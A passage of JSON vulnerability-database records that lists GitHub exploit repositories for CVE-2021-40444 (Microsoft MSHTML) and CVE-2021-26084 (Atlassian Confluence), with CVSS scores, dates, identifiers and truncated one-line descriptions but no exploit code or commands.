"privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:15", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-28T15:09:59", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-28T11:31:59", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:39", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T09:21:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T15:39:54", "id": "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:54", "description": "# Caboom\n\n```\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-11T16:31:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-13T12:52:15", "id": "6BC80C90-569E-5084-8C0E-891F12F1805E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:37:40", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T16:55:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-15T15:41:32", "id": "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:08", "description": "MSHTMHell: Malicious document bui...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T15:33:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T13:49:09", "id": "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:03", "description": "# CVE-2021-40444-CAB\nCVE-2021-40444 - Custom CAB templates from ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T10:14:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-09T17:56:16", "id": "24DE1902-4427-5442-BF63-7657293966E2", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444-Sample\nPatch CAB: https:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T09:43:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:56", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-24T23:17:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-24T23:17:28", "id": "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:10:41", "description": "# Docx-Exploit-2021\n\nThis docx exploit uses r...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-29T10:35:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-04-11T07:58:23", "id": "B9C2639D-9C07-5F11-B663-C144F457A9F7", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T08:47:22", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T22:34:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-31T01:08:02", "id": "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:37", "description": "# CVE-2021-40444-URL-Extractor\n\nPython script to extract embedde...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T16:54:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T19:01:48", "id": "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:09", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-22T13:29:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-22T13:41:39", "id": "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-28T14:47:32", "description": "# Microsoft-Office-Word-MSHTML-Remote-Code-Exe...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-19T08:16:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-28T11:34:15", "id": "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:48", "description": "# TIC4301_Project\nTIC4301 Project - CVE-2021-40444\n\nDownload the...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-16T07:07:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-06T13:36:02", "id": "111C9F44-593D-5E56-8040-615B48ED3E24", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-26T03:16:25", "description": "# CVE-2021-40444-POC\nAn attempt to reproduce Microsoft MSHTML Re...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T14:55:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-26T02:46:54", "id": "8B907536-B213-590D-81B9-32CF4A55322E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:15", "description": "# CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:06", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 